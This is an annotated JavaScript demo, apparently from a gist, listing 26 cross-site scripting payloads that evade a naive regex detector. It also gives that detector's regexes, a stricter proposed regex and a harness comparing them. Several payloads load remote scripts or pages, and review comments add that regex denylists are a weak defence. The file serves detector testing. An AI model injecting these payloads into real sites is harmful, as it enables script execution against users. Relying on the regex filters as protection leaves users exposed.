<html>
<script>
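// Demo: payloads that slip past a naive regex "XSS detector", and a stricter
// regex that catches them.
//
// NOTE(review): GitHub flags this gist as containing bidirectional Unicode
// characters; none are visible in this listing, so inspect the raw bytes
// before copying any payload into a test suite or a filter.
//
// NOTE(review): payloads 11-13 contain a literal `</script>`. When this file
// is loaded as an HTML document the parser ends the surrounding <script>
// element at the first one, so run this in Node or a devtools console.
//
// Every payload string below is kept exactly as the gist had it; each one
// deliberately carries whitespace, attributes or an event handler so that the
// "bare tag" regex `xssSimple` does not fire on it.
const xsss = [
  '<script >alert("XSS - 1");</script >',
  '<script type="application/javascript">alert("XSS - 2");</script >',
  '<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >',
  '<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />',
  '<input type="image" src onerror="alert(\"XSS - 5\")">',
  '<object data="a.a" onerror="alert(\"XSS - 6\")" />',
  '<object data="a.a" onerror="alert(\"XSS - 7\")">',
  '<link data="a.a" onerror="alert(\"XSS - 8\")">',
  // The trailing "// Uses console.log ..." text is part of the payload string
  // (the author's note, not a JS comment); it carries no `<`/`>` so it does
  // not change what the regexes see.
  '<input onfocus="console.log(\"XSS - 9\")" autofocus> // Uses console.log as "alert" will cause infinate loop',
  '<video ><source onerror="alert(\"XSS - 10\")" >',
  '<iframe srcdoc="<script>alert(\"XSS - 11\")</script>">',
  '<iframe srcdoc="<script>alert(\"XSS - 12\")</script>" />',
  '<iframe srcdoc="<script>alert(\"XSS - 13\")</script>"></iframe >',
  '<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >',
  '<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">',
  '<iframe style="display:none;" src="//a.a" onload="alert(\"XSS - 16\");"></iframe >',
  '<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert(\"XSS - 17\")"></div >',
  '<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert(\"XSS - 18\")">',
  '<frameset onload="alert(\"XSS - 19\")"><frame onload="Limited support"></frameset >',
  '<a href="javascript:alert(\"XSS - 20\")" style="text-decoration: none; color:#000;" > ',
  '<a onclick="alert(\"XSS - 21\")" style="text-decoration: none; color:#000;" > ',
  '<a onmouseover="alert(\"XSS - 22\")" style="text-decoration: none; color:#000;" > ',
  '<body onunload="alert(\"XSS - 23\")">',
  '<body onresize="alert(\"XSS - 24\");">',
  '<body onload="alert(\"XSS - 25\")">',
  '<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">',
];

// The "current" detector is the OR of these two regexes.
//
// xssSimple only fires on a *bare* tag: `<name>` / `</name>` with nothing but
// [a-z0-9%] between the brackets. Any whitespace or attribute defeats it,
// which is exactly what every payload above exploits. `<`, `/` and `>` may
// also appear URL-encoded (%3C, %2F, %3E).
const xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i');
// xssImgSrc fires on `<img …>` with each letter optionally URL-encoded; the
// `[^\n]+` is a literal newline inside the string, so the match cannot span
// lines. None of the payloads above use <img>, so it never fires here.
const xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i');
// Proposed addition: any `<…>` or `</…>` with at least two characters after
// the `<` (plus the degenerate `<>` / `</>`). It is NOT URL-decoded, and it
// says nothing about input that carries no tag at all — attribute injection
// (`" onmouseover="…`) or a `javascript:` URL dropped into an existing href
// still pass. See the test below.
const xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>');

/**
 * The gist's "current" check: bare-tag regex OR <img …> regex.
 * @param {string} value - untrusted input to inspect
 * @returns {boolean} true when either regex matches
 */
function isXss(value) {
  return xssSimple.test(value) || xssImgSrc.test(value);
}

/**
 * The gist's proposed check: the current one plus `xssAnyTag`.
 *
 * The gist declared this as a second `function isXss`. Function declarations
 * are hoisted, so that second body replaced the first for the WHOLE script
 * and the loop labelled "prints false for all" was really running this
 * version too (both loops printed true). Giving it its own name makes the
 * comparison honest.
 * @param {string} value - untrusted input to inspect
 * @returns {boolean} true when any of the three regexes matches
 */
function isXssWithAnyTag(value) {
  return isXss(value) || xssAnyTag.test(value);
}

// Regex denylists like these are a speed bump, not a control: the defence
// against XSS is context-aware output encoding at the sink (plus a CSP as
// backstop). Treat a `true` from either function as "inspect", never as
// proof that a `false` is safe.

/**
 * Print `result: check(`payload`)` for every payload, in the gist's format.
 * @param {string} label - heading printed before the run
 * @param {(value: string) => boolean} check - detector to exercise
 */
function report(label, check) {
  console.log(`--- ${label}`);
  for (const payload of xsss) {
    console.log(`${check(payload)}: ${check.name}(\`${payload}\`)`);
  }
}

// Current check: false for every payload EXCEPT 11-13, whose srcdoc embeds a
// bare `<script>` that xssSimple does match (the gist's own comment claimed
// "false for all").
report('current isXss', isXss);
// Proposed check: true for all 26 payloads.
report('isXss + any-tag', isXssWithAnyTag);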
</script>
</html>